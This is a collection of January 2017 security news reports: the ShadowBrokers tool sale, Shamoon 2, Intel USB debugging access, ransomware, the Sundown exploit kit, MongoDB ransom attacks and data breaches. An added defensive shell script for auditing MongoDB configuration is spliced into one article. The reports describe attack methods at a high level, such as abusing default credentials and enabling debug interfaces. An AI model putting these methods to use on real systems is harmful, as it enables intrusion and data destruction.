Besides this, malware researcher Jacob Williams analyzed the archive of "screenshots and output of the find command across the dump" that the hackers provided as evidence of legitimacy, and estimated that the tools may also include a Fully Undetectable (FUD) malware toolkit.

The FUD toolkit might have an ability to "evade/bypass personal security products," such as Avira, Avast, Dr.Web, ESET Antivirus, Comodo, McAfee Antivirus, Microsoft Essential, Panda, Symantec, Trend Micro and Kaspersky Antivirus.
Buyers can purchase the entire database of hacking tools that the Equation Group used against various countries in its espionage operations.
In August, the Shadow Brokers announced an auction attempting to sell the complete set of tools to the highest bidder, but the group canceled their auction in October due to little or no response on their public sale.
But now that the group has put Windows hacking tools up for sale, chances are that hackers and espionage groups will be interested in buying them.

ShadowBrokers offers for sale the stolen NSA Windows Hacking Tools
11.1.2017 securityaffairs BigBrothers
The ShadowBrokers, the hacker crew that stole the arsenal of the NSA-linked Equation Group, is offering the stolen NSA Windows hacking tools for sale.
The ShadowBrokers is the hacker crew that leaked a portion of the arsenal of the NSA-Linked Equation Group, a precious archive containing hacking tools and exploits.

At the end of October, the hackers leaked a fresh dump containing a list of servers that were hacked by the NSA-linked group known as Equation Group.

The Equation Group compromised these targets using the hacking tools codenamed INTONATION and PITCHIMPAIR. The ShadowBrokers provided links to two distinct PGP-encrypted archives: the first was offered for free as proof of the hack, while the passphrase for the second was ‘auctioned’, with the group asking 1 million BTC.

The first archive contained roughly 300 MB of data, including firewall exploits, hacking tools, and scripts with cryptonyms like BANANAUSURPER, BLATSTING, and BUZZDIRECTION.

Security researcher Mustafa Al-Bassam published an interesting post listing all the exploits, implants, and tools for hacking firewalls (“Firewall Operations”) included in the dump.

The Equation Group ‘s hackers targeted products made by Cisco, Fortigate, Juniper, TOPSEC, and Watchguard.

The majority of the files are at least three years old; the newest timestamp dates to October 2013.

In early October, TheShadowBrokers complained that no one seemed to be bidding on their precious archive; an alleged member of the group voiced frustration at the lack of interest in ponying up bitcoins to release the full NSA data dump.

In early December 2016, the group announced a crowdfunding campaign for the stolen arsenal, because its auction had received offers totalling less than two bitcoins.

We last heard from the Shadow Brokers in December 2016, when they changed their sales model and offered the NSA’s hacking arsenal for direct sale on an underground website.

The hacking group is back and now it is selling another package of hacking tools, “Equation Group Windows Warez.” The new archive includes a collection of Windows exploits and tools to evade detection of antivirus solutions.

One of the tools, the Remote Administration Tool (RAT) “DanderSpritz,” was already named in the documents leaked by Edward Snowden.

The group posted a message on their website on the ZeroNet, announcing the sale of the entire “Windows Warez” archive for 750 Bitcoin (around US$678,630).

The data dump offered for sale contains several hacking tools grouped into the following categories:

Fuzzing tools (used to discover errors and security loopholes)
Exploit Framework
Network Implants
Remote Administration Tools (RAT)
Remote Code Execution Exploits for IIS, RDP, RPC, SMB Protocols (Some Zero-Days)
SMB BackDoor (Implant)
Malware researcher Jacob Williams published an analysis of the archive of “screenshots and output of the find command across the dump” provided by the ShadowBrokers. Williams started by searching for the term “Psp_Avoidance”, which appears in one of the screenshots published by the group.

Googling the term “psp computer network operations”, the researcher got back as the fifth result a page from ManTech describing the ACTP CNO Programmer Course; the course documentation indicates that PSP is an acronym for “Personal Security Product.”

“So, circling back around, what is Psp_Avoidance? Obviously, we don’t know – but if the acronym is correct, it would seem to be software built to evade personal security products, which directory listings suggest (as does ManTech) are antivirus programs.” wrote the expert.
“Should you run antivirus products? Sure. At Rendition Infosec we tell customers that operating without AV is like driving a car with no airbags. But this dump suggests that advanced attackers have mitigations for antivirus products – a sobering reality for organizations without defense in depth. “
The only certainty at this moment is that a powerful arsenal, including hacking tools that a threat actor could use in the wild for large-scale espionage campaigns, is up for sale.

And with Windows tools now on offer, hackers and espionage groups may well be interested in buying them.

A Second variant of Shamoon 2 targets virtualization products
11.1.2017 securityaffairs

A second variant of the Shamoon 2 malware was discovered by researchers at Palo Alto Networks, this threat also targets virtualization products.
A new strain of the Shamoon 2 malware has been spotted by security experts at Palo Alto Networks; this variant also targets virtualization products.

Shamoon, also known as Disttrack, was first spotted in a wave of attacks targeting companies in Saudi Arabia in 2012; among the victims was the oil giant Saudi Aramco. Shamoon’s principal capability is wiping data from the hard drives of infected systems.

In the attack against Saudi Aramco, Shamoon wiped data on over 30,000 computers and overwrote the hard drives’ Master Boot Record (MBR) with an image of a burning US flag.

The malware was first analyzed by Kaspersky Lab, which linked the samples to the “wiper agent” because one of the modules contains a string whose name includes “wiper”.

Researchers at Seculert who analyzed Shamoon found that it can also overwrite the machine’s MBR. Before rendering the infected PC unusable, it gathers data from the victim: it steals information from the ‘Users’, ‘Documents and Settings’, ‘System32/Drivers’ and ‘System32/Config’ folders on Windows computers and sends it to another infected PC on the same internal network.

In December, malware researchers from Palo Alto Networks and Symantec discovered a new variant, dubbed Shamoon 2, that was used in at least one targeted attack against a single Saudi organization, Saudi Arabia’s General Authority of Civil Aviation (GACA).

“Why Shamoon has suddenly returned again after four years is unknown. However, with its highly destructive payload, it is clear that the attackers want their targets to sit up and take notice,” reported Symantec.

“Last week, Unit 42 came across new Disttrack samples that appear to have been used in an updated attack campaign. The attack targeted at least one organization in Saudi Arabia, which aligns with the targeting of the initial Shamoon attacks. It appears the purpose of the new Disttrack samples were solely focused on destruction, as the samples were configured with a non-operational C2 server to report to and were set to begin wiping data exactly on 2016/11/17 20:45. In another similarity to Shamoon, this is the end of the work week in Saudi Arabia (their work week is from Sunday to Thursdays), so the malware had potentially the entire weekend to spread. The Shamoon attacks took place on Lailat al Qadr, the holiest night of the year for Muslims; another time the attackers could be reasonably certain employees would not be at work.” reads an analysis published by Palo Alto Networks.

Now a second variant of Shamoon 2 has been spotted by Palo Alto Networks, configured to start wiping infected systems at 1:30 AM (Saudi Arabia time) on November 29, when employees of the targeted organization were likely at home.

The first Shamoon 2 variant analyzed by the experts had a default configuration that executed the disk-wiping component at 8:45 PM local time on Thursday, November 17. Since the working week in Saudi Arabia runs from Sunday to Thursday, the attackers used the weekend pause to maximize the effect of the attack.

Both payloads were similar, but the experts’ analysis revealed some differences.

The second Shamoon 2 variant included credentials for virtualization products from Huawei; it targeted virtual desktop infrastructure (VDI) products such as FusionCloud.

This suggests that the attackers knew the target organization used this specific virtualization product. The hackers used the default credentials listed in the product’s official documentation, hoping the targeted organization had not changed them. According to the experts, the threat actors may thereby have gained access to the appliances hosting the infrastructure.

“VDI solutions can provide some protection against a destructive malware like Disttrack through the ability to load snapshots of wiped systems. Also, since FusionCloud systems run a Linux operating system, which would not be susceptible to wiping by the Windows-only Disttrack malware, this could be seen as a reasonable countermeasure against attacks like Shamoon,” reads the blog post published by Palo Alto Networks.

“However, if the attacker was able to log into the VDI management interfaces using the account credentials they could manually carry out destructive activities against the VDI deployment, as well as any snapshot,”

Researchers observed that the communications module used by the threat was configured without a C&C: the module lacks any IP address or domain name for a C2 server in its configuration.

I suggest you take a look at the report, which also includes Indicators of Compromise for the threat.

Debugging mechanism in Intel CPUs allows seizing control via USB port
10.1.2017 SC Magazine UK Hacking

Researchers are warning that an Intel chip debugger leaves the chip open to hacking and because it sits below the software layer isn't easily detected.
Are attacks on the physical layer on the rise?
Researchers from Positive Technologies have revealed that some new Intel CPUs contain a debugging interface, accessible via USB 3.0 ports, that can be used to obtain full control over a system and perform attacks that are undetectable by current security tools.
An attacker could use this to bypass all security systems, embedding code that persists over time, reading any data on the machine and even rendering it inoperative, for instance by rewriting its BIOS.
A talk on the mechanisms needed for such attacks, and ways to protect against them, was given by Maxim Goryachy and Mark Ermolov at the 33rd Chaos Communication Congress in Hamburg, Germany.
The duo noted: “These manufacturer-created hardware mechanisms have legitimate purposes, such as special debugging features for hardware configuration and other beneficial uses. But now these mechanisms are available to attackers as well. Performing such attacks does not require nation-state resources or even special equipment.”
The duo analysed and demonstrated one of these mechanisms in their presentation. The JTAG (Joint Test Action Group) debugging interface, now accessible via USB, has the potential to enable dangerous and virtually undetectable attacks. JTAG works below the software layer for the purpose of hardware debugging of the OS kernel, hypervisors and drivers. At the same time, though, this CPU access can be abused for malicious purposes.
On older Intel CPUs, accessing JTAG required connecting a special device (ITP-XDP) to a debugging port on the motherboard, so JTAG was difficult to access for both troubleshooters and potential attackers.
However, starting with the Skylake processor family in 2015, Intel introduced the Direct Connect Interface (DCI) which provides access to the JTAG debugging interface via common USB 3.0 ports.
No software or hardware manipulations are required to make target computers vulnerable — merely having the DCI interface enabled is sufficient. As the researchers found, this can be accomplished in several ways, and on many computers, DCI is enabled out-of-the-box and not blocked by default.
SC Media UK spoke with Maxim Goryachy and asked how someone would go about tricking a user into enabling the DCI interface.
Goryachy said: “There are several ways someone could do this. An attacker could change the BIOS configuration (for example, with a use of a Flash programmator) when they have physical access to the equipment during manufacturing, storage or usage. Some BIOSs do not block the DCI configuration which is why there is the possibility of turning on the DCI.”
Goryachy and Ermolov speculated that this mechanism in Intel CPUs could lead to a whole new class of Bad USB-like attacks, but at a deeper and even more dangerous level than their predecessor.
In their concluding remarks, the researchers proposed a number of protective measures based on use of Intel's BootGuard feature and forbidding activation of the debugging interface.
SC asked Goryachy if he would compare this vulnerability to Stuxnet, to which he said: “This mechanism can be used on a hacked system regardless of the OS installed. Stuxnet was infecting only Windows machines, meanwhile the DCI can be used on any system with Intel U-series processor. This series is used on laptops and NUC. As of today, no publicly available security system will detect it.”
Goryachy told SC, “We have reported this case to Intel. As of today, this mechanism can be exploited only on Intel U-series processors.”

Los Angeles College Pays Hackers $28,000 Ransom To Get Its Files Back
10.1.2017 thehackernews

Ransomware has turned into a noxious game that lets hackers get paid effortlessly.
Once again the heat was felt by the Los Angeles Valley College (LAVC) when hackers managed to infect its computer network with ransomware and demanded US$28,000 payment in Bitcoins to get back online.
The cyber-attack occurred over the winter break and caused widespread disruption to online, financial aid, email and voicemail systems, including locking 1,800 students and staff out of their computers.

As the situation got out of hand, the Los Angeles Community College District (LACCD) agreed to pay the ransom demand of $28,000 in Bitcoin to the criminals in order to obtain the decryption keys and resume operations, the school newspaper, The Valley Star, reports.
The cyber criminals gave the college a week to pay the ransom and threatened to delete all the data if they were not paid.
Like most ransomware victims, the college apparently was not properly backing up its data, so the district agreed to pay the ransom to quickly recover access to its systems and data.
According to college officials, it was ultimately cheaper to pay the ransom than to remove the unknown ransomware from their systems, recover the data and restore other services.

After paying the ransom, the college was given a decryption key to regain access to its valuable data.
"LACCD and LAVC information technology staff, outside cybersecurity experts and law enforcement are working together to determine the specific nature and impact of this incident. Our top priority is the integrity of student, faculty and employee data, and we will continue to communicate with the LAVC community and the public as the investigation proceeds." the College wrote in a report [PDF].
The college was lucky this time, because in the case of ransomware there is no guarantee that one will get the right decryption key in return. For example, the recently discovered KillDisk ransomware that targets Linux machines demands $218,000 to decrypt, but in return wipes out the data permanently.
One of the most notorious examples of ransomware attacks took place in March last year, when crooks locked down the computers and sealed all sensitive files of a Los Angeles hospital, including patient data, which eventually forced the hospital to pay $17,000.
Last year we saw an enormous rise in ransomware threats, both in numbers and sophistication, and the only way to secure your environment is to deploy an automated and isolated backup mechanism.

CVE-2016-7200 & CVE-2016-7201 Edge flaws added to the Sundown Exploit Kit
10.1.2017 securityaffairs

The operators behind the Sundown exploit kit have started using two Microsoft Edge flaws just a few days after researchers published a PoC exploit.
The Sundown exploit kit is becoming one of the most popular crimeware kits in the hacking underground. The last time we saw it was at the end of 2016, when malware researchers spotted a new variant of the Sundown exploit kit that leverages steganography to hide exploit code in harmless-looking image files.

Recently cyber criminals added to the Sundown exploit kit two Edge vulnerabilities tracked as CVE-2016-7200 and CVE-2016-7201.

Both flaws were addressed by Microsoft with a security bulletin (MS16-129) issued in November 2016. The flaws reside in the way the Chakra JavaScript scripting engine handles objects and can trigger memory corruption.

A remote attacker can exploit the vulnerabilities to execute arbitrary code in the context of the current user by tricking victims into visiting a specially crafted website.

On January 4, security experts at the firm Theori confirmed the availability of a PoC exploit for CVE-2016-7200 and CVE-2016-7201; just a few days later the code was included in the Sundown exploit kit.

Theori @theori_io
Proof-of-Concept exploit for Edge bugs (CVE-2016-7200 & CVE-2016-7201) —https://github.com/theori-io/chakra-2016-11 …
00:52 - 5 Gen 2017
The popular security researcher Kafeine confirmed the exploits being integrated by the Sundown exploit kit.

Sundown exploit kit

“The exploits are spotted first in Sundown, but integration in RIG/Empire/Neutrino/Magnitude/Kaixin should be a matter of hours/days.” explained Kafeine.

Crooks leveraged the Sundown exploit kit mostly to deliver ZLoader, but it was also used to deliver other malicious payloads, including Zeus Panda, Dreambot, Chthonic, Andromeda, Neutrino Bot, Betabot, Smokebot, Remcos, Kronos and a bitcoin miner.

According to Malwarebytes Labs, a variant of the Sundown exploit kit was recently seen distributing a cryptocurrency Monero mining application.

“We recently encountered an atypical case of Sundown EK in the wild – usually the landing page is obfuscated, but in this case there was plain JavaScript. The exploit was dropping some malicious payloads” reads a blog post published by Malwarebytes Labs.

Kafeine highlighted that this is the first true innovation in the exploit kit landscape in six months; he also added that the criminal ecosystem has lost its locomotive, the Angler EK.

“After not far from 6 months without new exploit integrated in an EK ecosystem which has lost its innovation locomotive (Angler) , the drive-by landscape is struggling to stay in shape. Low infection rate means more difficulties to properly convert bought traffic.” added Kafeine.

The last time malware researchers observed the introduction of fresh exploit code in an exploit kit was this summer, when malware authors added the PoC for CVE-2016-0189 to the Neutrino exploit kit.

Hello Kitty database leaked online, 3.3 million fans affected
10.1.2017 securityaffairs Incindent

The Hello Kitty MongoDB database that leaked one year ago has recently resurfaced on the web; it includes 3.3 million records belonging to Hello Kitty fans.
The security researcher Chris Vickery discovered a Sanrio database that was misconfigured and exposed to the public in 2015.

In December 2015, Vickery reported the discovery to Databreaches.net and Salted Hash.

According to Vickery, not only the primary database sanriotown.com was affected; the fan portals of the following websites were also impacted by the leak:

The expert noticed that 186,261 of the records belonged to Sanrio users under the age of 18.

At the time of its discovery, Sanrio explained that it doesn’t believe the data was stolen. Now the same MongoDB database has surfaced online and the 3.3 million records put Hello Kitty fans at risk.

During the weekend, the data breach notification service LeakedSource confirmed that a Sanrio database containing 3,345,168 users has surfaced online.

The records contained in the leaked database include first and last names, gender, encoded birthday (easily reversible), country, email addresses, SHA-1 hash passwords, password hint questions with corresponding answers, and other information.

Hello Kitty portal

Vickery confirmed that data available via LeakedSource is identical to what he discovered more than a year ago.

The only difference between the two databases is a field, dubbed ‘incomeRange,’ in the LeakedSource records that was not present in the original archive. The “incomeRange” attribute has values ranging from 0 to 150, but its meaning is still unclear.

Chris Vickery has discovered many other high-profile cases of MongoDB databases exposed on the Internet. In December 2015 he discovered 191 million records belonging to US voters online, and in April 2016 he discovered a 132 GB MongoDB database open online containing 93.4 million Mexican voter records.
In March 2016, Chris Vickery discovered online the database of the Kinoptic iOS app, which had been abandoned by its developers, with details of over 198,000 users.

A few hours ago I published another post related to cyber attacks against misconfigured MongoDB databases.

MongoDB ransom attacks are soaring: according to the Australian Communications and Media Authority Antipodes, the number of hacked systems more than doubled to 27,000 in just a day. According to the experts, the hackers are running an extortion scheme, copying and deleting data from vulnerable databases.

Number of MongoDB ransom attacks peaked 27,000 in a day
10.1.2017 securityaffairs Virus

According to the Australian Communications and Media Authority Antipodes, the number of hacked MongoDB databases more than doubled to 27,000 in just a day.
MongoDB ransom attacks are soaring: according to the Australian Communications and Media Authority Antipodes, the number of hacked systems more than doubled to 27,000 in just a day. According to the experts, the hackers are running an extortion scheme, copying and deleting data from vulnerable databases.

Crooks request the payment of a ransom in order to return the data and help the company fix the flaw they exploited. Last week I reported the story of a mysterious attacker who goes online with the harak1r1 moniker; he is breaking into unprotected MongoDB databases, stealing their content, and requesting a 0.2 bitcoin (US$184) ransom to return the data.

The attacks were discovered by the co-founder of the GDI Foundation, Victor Gevers, who warned of the poor security of MongoDB installations in the wild. The security expert discovered 196 MongoDB instances that were wiped by Harak1r1 and held for ransom.

The analysis of the Bitcoin wallet used by Harak1r1 revealed that at least 22 victims appeared to have paid.


Adrian Sanabria @sawaba
@SteveD3 @LawrenceHecht @achillean @akmalchaudhri @0xDUDE FWIW, in my experience, Shodan is a varying fraction of what's actually out there.
Victor Gevers @0xDUDE
@sawaba @SteveD3 @LawrenceHecht @achillean @akmalchaudhri That is why I am looking at different sources like Zoomeye (99,491 candidates) pic.twitter.com/VApFdRbF7g
18:17 - 5 Gen 2017
According to the security researcher Niall Merrigan, the number of attacks has soared from 12,000 earlier today to 27,633 in just 12 hours. According to the expert, the attacks were carried out by at least 15 different actors. One attacker, who goes online with the moniker ‘kraken0’, has compromised 15,482 MongoDB databases and is demanding that victims pay 1 bitcoin ($US921).


Niall Merrigan @nmerrigan
Latest #Mongodb ransack looks like ~27K servers compromised from 12K this morning.. Numbers and info https://docs.google.com/spreadsheets/d/1QonE9oeMOQHVh8heFIyeqrjfKEViL0poLnY8mAakKhM/edit?usp=sharing … with @0xDUDE
23:03 - 8 Gen 2017
The researcher is collecting information on the attacks including information provided by Victor Gevers.

The Australian Communications and Media Authority Antipodes has been monitoring exposed MongoDB installations since July 2015 using intelligence provided by the ShadowServer nonprofit.

The organization reports about 400 exposed MongoDB databases a day to 90 percent of Australia’s network providers via the Australian Internet Security Initiative (AISI).

AISI statistics on Exposed MongoDB published by ElReg

Stay tuned …

Over 27,000 MongoDB Databases Held For Ransom Within A Week
9.1.2017 thehackernews
The ransomware attacks on poorly secured MongoDB installations have doubled in just a day.
A hacker going by the handle Harak1r1 is accessing, copying and deleting unpatched or badly configured MongoDB databases and then demanding a ransom from administrators in exchange for the lost data.
It all started on Monday when security researcher Victor Gevers identified nearly 200 MongoDB installations that had been erased and held for ransom, with victims asked to pay hefty ransoms for the data to be restored.
By Tuesday, this number reached approximately 2,000 databases as reported by Shodan Founder John Matherly, and by Friday, Gevers and fellow security researcher Niall Merrigan updated this count to 10,500.

However, according to recent statistics compiled by Merrigan, the number of compromised systems has more than doubled to 27,000 over the course of about 12 hours.
What's worse?
Initial attacks saw ransoms of 0.2 Bitcoins (nearly US$184) to the attacker, of which 22 victims appeared to have paid. But now the attacker is demanding up to 1BTC (around 906 USD).
The researchers have logged some 15 distinct attackers, of which an attacker using email handle kraken0 has compromised 15,482 MongoDB instances and is demanding 1 Bitcoin to return the lost data, though no one appears to have paid.
This means that after the initial story was made public, more hackers and hacking groups started doing the same — accessing, copying and deleting badly configured MongoDB databases — for ransom.
Who is responsible for the MongoDB Ransomware?

You! Yes, all those administrators who are using misconfigured MongoDB databases are the reason for this sudden spurt in these attacks.
In every case, the target MongoDB server had an administrator account that was configured without a password.
Many poorly secured MongoDB databases can be identified using the Shodan search engine, which currently shows more than 99,000 vulnerable MongoDB instances.
This is the case even though the company provides an easy way to set up authentication in MongoDB.
How to Protect Yourself?
Since there's no evidence the hackers had copied the data before deleting it, promises to restore the already-deleted databases in return for a hefty ransom are dubious.
Gevers advises affected MongoDB database owners not to pay and to get help from security professionals. He and Merrigan have helped some 112 victims secure their exposed MongoDB databases.
People who administer websites that use MongoDB are advised to follow these steps:
Enable authentication, which provides you 'defense in depth' if your network is compromised. Edit your MongoDB configuration file — auth = true.
Use firewalls — Disable remote access to the MongoDB, if possible. Avoid common pitfalls by blocking access to port 27017 or binding local IP addresses to limit access to servers.
Administrators are strongly recommended to update MongoDB software to the latest release.
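As an added example (not from the article and not MongoDB's own tooling), a small POSIX shell audit that checks a mongod configuration file for the two settings the steps above turn on: authentication and a non-wildcard bind address. Both sample configurations are constructed; the checker understands the legacy "auth = true" key style quoted above as well as the YAML style (security.authorization, net.bindIp) used by current releases.

```shell
#!/bin/sh
# Added example: audit a mongod.conf for the settings that stop the
# "open MongoDB" class of incident. Not part of the article or of MongoDB.

# Constructed sample: an exposed instance in the legacy key = value format.
# No "auth = true" line, and it listens on every interface.
WEAK_CONF_LEGACY='dbpath = /var/lib/mongodb
bind_ip = 0.0.0.0
port = 27017
# auth is absent: anyone reaching port 27017 is an administrator'

# Constructed sample: the hardened equivalent in YAML format.
HARDENED_CONF_YAML='storage:
  dbPath: /var/lib/mongodb
net:
  port: 27017
  bindIp: 127.0.0.1
security:
  authorization: enabled'

# audit_mongod_conf FILE
# Prints one line per finding. Returns 0 when both checks pass, 1 otherwise.
audit_mongod_conf() {
  conf="$1"
  problems=0

  # Check 1: authentication. Legacy "auth = true" or YAML
  # "security:\n  authorization: enabled" both count.
  if ! grep -Eq '^[[:space:]]*auth[[:space:]]*=[[:space:]]*true' "$conf" &&
     ! grep -Eq '^[[:space:]]*authorization:[[:space:]]*enabled' "$conf"; then
    echo "FAIL $conf: authentication not enabled (auth = true / security.authorization: enabled)"
    problems=$((problems + 1))
  fi

  # Check 2: bind address. Take the first bind_ip / bindIp line and strip the key.
  bind=$(grep -E '^[[:space:]]*(bind_ip|bindIp)[[:space:]]*[=:]' "$conf" | head -n 1 |
         sed -E 's/^[[:space:]]*(bind_ip|bindIp)[[:space:]]*[=:][[:space:]]*//')
  if grep -Eq '^[[:space:]]*bindIpAll:[[:space:]]*true' "$conf"; then
    echo "FAIL $conf: net.bindIpAll is true, listening on every interface"
    problems=$((problems + 1))
  elif [ -z "$bind" ]; then
    # Releases before 3.6 listened on all interfaces when no bind address was set.
    echo "FAIL $conf: no bind address set"
    problems=$((problems + 1))
  elif echo "$bind" | grep -Eq '(^|,)[[:space:]]*0\.0\.0\.0'; then
    echo "FAIL $conf: bind address $bind listens on every interface"
    problems=$((problems + 1))
  fi

  if [ "$problems" -eq 0 ]; then
    echo "OK   $conf: authentication on, bound to $bind"
    return 0
  fi
  return 1
}

# Write the constructed samples to a scratch directory and audit both.
tmpdir=$(mktemp -d)
printf '%s\n' "$WEAK_CONF_LEGACY" > "$tmpdir/weak.conf"
printf '%s\n' "$HARDENED_CONF_YAML" > "$tmpdir/hardened.conf"
audit_mongod_conf "$tmpdir/weak.conf" || true      # expected: two FAIL lines
audit_mongod_conf "$tmpdir/hardened.conf" || true  # expected: OK
```

Binding to 127.0.0.1 and enabling authorization covers the first two steps; the firewall rule for port 27017 still has to be added on the host, since the configuration file cannot express it.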
Meanwhile, MongoDB developers have released an updated guide to MongoDB security, explaining these ransomware-inspired attacks and how you can detect and prevent them, along with the steps to check the integrity of your

ESEA data breach, 1.5 million gamers’ records leaked
9.1.2017 securityaffairs Incindent

The E-Sports Entertainment Association (ESEA), one of the largest competitive video gaming communities, was hacked; 1.5 million players have been affected.
Bad news for gamers: the E-Sports Entertainment Association (ESEA), one of the largest competitive video gaming communities, was hacked in December. The data breach exposed the profiles of more than 1.5 million players.

The incident was also confirmed on Saturday by the breach notification service LeakedSource that reported 1,503,707 ESEA records were compromised.

The records include username, first and last name, password bcrypt hash, email address, registration date, city, state (or province), last login, date of birth, zip code, phone number, website URL, Steam ID, Xbox ID, and PSN ID.

As you can see, the profiles are very detailed. The use of bcrypt hashes protects users’ passwords, but gamers are still exposed to a wide range of malicious activities such as social engineering and spear phishing attacks.

ESEA shared the link to the following “Outage and Security Update” via Twitter.

“Recently news has been made that ESEA’s user data has been leaked online. We expected something like this could happen but have not confirmed this is ESEA’s data. We notified the community on December 30th, 2016 about the possibility this could happen. The type of data and storage standards was disclosed. We have been working around the clock to further fortify security and will bring our website online shortly when that next round is complete. This possible user data leak is not connected to the current service outage.”

ESEA Outage and Security Update

Read: http://tl.gd/n_1spgt4i
04:29 - 8 Gen 2017
The company was informed of the data breach on December 27 and issued a security warning on December 30, 2016. At the time of writing, ESEA had only confirmed the data leak but had still not admitted that profiles were accessed from its systems.

The news of the ESEA data breach is circulating on the Internet, many players confirmed it on Reddit.

Jimmy Whisenhunt ✔ @jimmywhis
.@BigSecurityNews confirmed my ESEA account info after they asked a couple 'larger' followed users to help verify
05:10 - 8 Gen 2017
Salted HASH, quoting a LeakedSource spokesperson, reported that the ESEA data breach was part of a ransom scheme. Crooks demanded $50,000 in payment to avoid disclosing the hack.

In response to the incident, the company reset passwords, multi-factor authentication tokens, and security questions.

Crooks target UK schools with ‘Department of Education’ ransomware
9.1.2017 securityaffairs

Action Fraud is warning of ‘Department of Education’ ransomware: crooks are posing as government officials to trick people into installing ransomware.
This is a story of another string of cyber attacks that leverage ransomware to compromise victims’ machines.

Cyber criminals are targeting schools in the UK, asking victims to pay up to £8,000 to unlock encrypted documents.

The British Action Fraud is warning of fraudsters who are posing as government officials from the Department of Education in order to trick people into installing ransomware on their computers.

The crooks initially cold call education establishments asking for the head teachers’ email addresses, then target them with malicious messages carrying zip attachments that supposedly contain sensitive information. The attachments contain the ransomware.

“Fraudsters are initially cold calling education establishments claiming to be from the “Department of Education”. They then ask to be given the personal email and/or phone number of the head teacher/financial administrator.” reads the advisory published by ActionFraud.

“The fraudsters claim that they need to send guidance forms to the head teacher (these so far have varied from exam guidance to mental health assessments). The scammers on the phone will claim that they need to send these documents directly to the head teacher and not to a generic school inbox, using the argument that they contain sensitive information.”

Educational establishments must be vigilant against this kind of threat and must check that their systems are up to date.

The Action Fraud organization added that similar scams have been carried out by fraudsters claiming to be from the Department for Work and Pensions and from telecoms providers. In both cases the cyber criminals target the head teacher.

How to avoid such kind of scams?

First of all, be vigilant of any suspicious activity, even when attackers seem to know your personal details or details about your staff. In this specific case, note that the “Department of Education” is not a real government department; the hackers used it instead of the real name, Department for Education.
Keep defense solutions and software (i.e. OS and applications) up to date.
Never open attachments in unsolicited emails, nor click on embedded links.
Make regular backups of your data and be sure that the backups are stored on an external storage system.

Recent power outages in Turkey were also caused by cyber attacks
9.1.2017 securityaffairs Cyber

Turkish Energy Minister Berat Albayrak believes that power outages in Istanbul and other areas in Turkey have also been caused by cyber attacks.
According to Turkish Energy Minister Berat Albayrak, Istanbul and other areas in Turkey have been experiencing power outages since last week, caused by sabotage of underground power lines and by cyber attacks originating in the US.
“Yesterday, we faced an intense, US-originated cyber attack. These attacks have been carried out systematically on different parts of the Energy Ministry, but we have repelled them all,” explained the Turkish Energy Minister in an interview with A Haber TV.
The technicians discovered sabotage of underground lines in three districts of Istanbul, coinciding with adverse weather conditions.

People walk on Taksim square during snowfalls in Istanbul on January 7, 2017.
A heavy snowstorm paralysed life in Istanbul with hundreds of flights cancelled and the Bosphorus closed to shipping traffic. The snowstorm dumped almost 40 centimetres (16 inches) of snow in parts of the Turkish metropolis overnight, causing havoc on roads as travellers sought to leave the city for the weekend getaway. / AFP PHOTO / YASIN AKGUL

Initially, the Energy Ministry reported that the power outages were caused by damage to the power grid from the snow.

Recently, a source in the ministry confirmed to the state news agency Anadolu that the problems were also caused by cyber attacks.

“Many infiltration attempts to the systems controlling our transmission and electricity producing lines were determined and prevented. The infiltration attempts are indicators of a major sabotage preparation against Turkey’s national electricity network,” the anonymous source told the agency.

The Turkish Government continues to accuse US-based Turkish preacher Fethullah Gulen of using a wide network of supporters in Turkey to undermine the country’s stability.

Gulen denies all accusations, and the US refuses to comply with the Turkish request for his extradition.

Some prominent experts believe that Turkish authorities are facing sabotage and problems with legacy infrastructure and are using “cyber” as a scapegoat for the situation.

French Minister Le Drian on cyber espionage: France is not immune, ready to hack back
9.1.2017 securityaffairs Cyber

Defense Minister Le Drian expressed concerns about cyber attacks against defense systems and warned of hacking campaigns against the upcoming elections.
According to Defence Minister Jean-Yves Le Drian, French defense was targeted by thousands of attacks in 2016: France thwarted more than 24,000 cyber attacks against defence systems last year.

The Minister confirmed that thousands of attacks from external sources targeted the defense architecture, including France’s drone systems, but all the attacks have been repelled.

The number of cyber attacks in France has increased substantially over the last three years. According to Mr Le Drian, hacking attacks represent a serious threat to national infrastructure.

The French Defence Minister revealed that cyber attacks were doubling every year and expressed concerns about possible offensives against this year’s presidential election.

In an interview with Le Journal du Dimanche newspaper, the French Minister said that France “should not be naive”.

French Minister Le Drian on cyber espionage

The Minister warns of possible cyber attacks like the ones that targeted the 2016 US Presidential Election.

In France, the conservative candidate Francois Fillon has been praised by Russian president Vladimir Putin for his intention to intensify the relationship with the Kremlin. On the other side, the candidate Marine Le Pen is in total opposition to Russia, and for this reason experts believe that hackers could target her and her party.

Relations between Russia and France are not good due to the position of President Hollande on the dispute between Russia and Ukraine in the 2014 Crimean Crisis.

President Hollande also accused Russia of war crimes over its bombardment of the Syrian city of Aleppo.

The Minister is overseeing an overhaul of the cyber-security operations conducted by his Government.

“Our services have discussed the subject, if only to learn lessons for the future,” said Le Drian, who also referred to a cyber attack against the 2015 French TV station TV5Monde.

According to many security firms, including FireEye, the Russian APT 28 group was involved in the attack against the French TV station.

According to security experts at FireEye, the Russian APT28 (also known as Pawn Storm, Tsar Team, Fancy Bear and Sednit) may have used the name of ISIS as a diversionary strategy; the experts noticed a number of similarities in the TTPs used by the Russian group and the one who breached the network at TV5Monde.

I found the posture of the French Minister very interesting: he is aware that foreign hackers could break into national infrastructure, but he also contemplates the possibility of striking back at the attackers.

Le Drian confirmed that the number of “digital soldiers” working for the French defense would be doubled to 2,600 by 2019, with 600 cyber experts joining the cyber army.

“Le Drian said that in case of a cyber attack, the country could respond in kind as well as with conventional weapons.” reported the Reuters Agency.

FTC filed a lawsuit against D-Link over failure to secure its IoT devices
8.1.2017 securityaffairs

The FTC charges the Taiwanese IT giant D-Link with putting consumers’ privacy at risk due to its failure to implement adequate security measures for its IoT devices.
The U.S. Federal Trade Commission (FTC) has filed a lawsuit against the Taiwanese firm D-Link, over failure to secure its IoT products, including IP cameras and routers.

The company has produced promotional materials promising “Advanced Network Security” for its products, but according to the authorities the reality is different, because it has failed to fix flaws that expose consumers to risk.
“A lawsuit the FTC filed against D-Link, a global manufacturer of computer networking equipment and other connected devices, alleges that the company made deceptive claims about the security of its products and engaged in unfair practices that put consumers’ privacy at risk.” reads the announcement from FTC.
The lawsuit includes examples of D-Link’s choices that put consumers’ privacy at risk:
D-Link allegedly hard-coded login credentials into D-Link camera software that could allow unauthorized access to cameras’ live feed.
D-Link allegedly left users’ login credentials for its mobile app unsecured in clear, readable text on consumers’ devices.
